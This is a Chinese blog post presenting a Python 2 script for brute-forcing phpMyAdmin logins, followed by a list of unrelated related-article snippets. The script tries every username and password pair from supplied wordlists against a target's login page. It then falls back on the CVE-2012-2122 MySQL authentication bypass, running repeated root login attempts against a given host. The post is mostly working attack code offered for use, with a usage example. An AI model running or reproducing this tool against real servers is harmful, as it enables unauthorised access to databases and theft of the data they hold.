Python写的PHPMyAdmin暴力破解工具代码
admin
2023-07-31 02:05:28
0

PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。

#!/usr/bin/env python
import urllib 
import urllib2 
import cookielib 
import sys
import subprocess
def Crack(url,username,password):
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) 
	headers = {\'User-Agent\' : \'Mozilla/5.0 (Windows NT 6.1; WOW64)\'}
	params = urllib.urlencode({\'pma_username\': username, \'pma_password\': password})
	request = urllib2.Request(url+\"/index.php\", params,headers)
	response = opener.open(request) 
	a=response.read() 
	if a.find(\'Database server\')!=-1 and a.find(\'name=\"login_form\"\')==-1:
		return username,password
	return 0
def MySQLAuthenticationBypassCheck(host,port):
	i=0
	while i<300:
		i=i+1
		subprocess.Popen(\"mysql --host=%s -P %s -uroot -piswin\" % (host,port),shell=True).wait()
if __name__ == \'__main__\':
	if len(sys.argv)<4:
		print \"#author:iswin\\n#useage python pma.py http://www.jb51.net/phpmyadmin/ username.txt password.txt\"
		sys.exit()
	print \"Bruting,Pleas wait...\"
	for name in open(sys.argv[2],\"r\"):
		for passw in open(sys.argv[3],\"r\"):
			state=Crack(sys.argv[1],name,passw)
			if state!=0:
				print \"\\nBrute successful\"
				print \"UserName: \"+state[0]+\"PassWord: \"+state[1]
				sys.exit()
	print \"Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck\"
	choice=raw_input(\'Warning:This function needs mysql environment.\\nY:Try to MySQLAuthenticationBypassCheck\\nOthers:Exit\\n\')
	if choice==\'Y\' or choice==\'y\':
		host=raw_input(\'Host:\')
		port=raw_input(\'Port:\')
		MySQLAuthenticationBypassCheck(host,port)

相关内容

热门资讯

Mobi、epub格式电子书如... 在wps里全局设置里有一个文件关联,打开,勾选电子书文件选项就可以了。
定时清理删除C:\Progra... C:\Program Files (x86)下面很多scoped_dir开头的文件夹 写个批处理 定...
scoped_dir32_70... 一台虚拟机C盘总是莫名奇妙的空间用完,导致很多软件没法再运行。经过仔细检查发现是C:\Program...
500 行 Python 代码... 语法分析器描述了一个句子的语法结构,用来帮助其他的应用进行推理。自然语言引入了很多意外的歧义,以我们...
小程序支付时提示:appid和... [Q]小程序支付时提示:appid和mch_id不匹配 [A]小程序和微信支付没有进行关联,访问“小...
pycparser 是一个用... `pycparser` 是一个用 Python 编写的 C 语言解析器。它可以用来解析 C 代码并构...
微信小程序使用slider实现... 众所周知哈,微信小程序里面的音频播放是没有进度条的,但最近有个项目呢,客户要求音频要有进度条控制,所...
65536是2的几次方 计算2... 65536是2的16次方:65536=2⁶ 65536是256的2次方:65536=256 6553...
Apache Doris 2.... 亲爱的社区小伙伴们,我们很高兴地向大家宣布,Apache Doris 2.0.0 版本已于...
项目管理和工程管理的区别 项目管理 项目管理,顾名思义就是专注于开发和完成项目的管理,以实现目标并满足成功标准和项目要求。 工...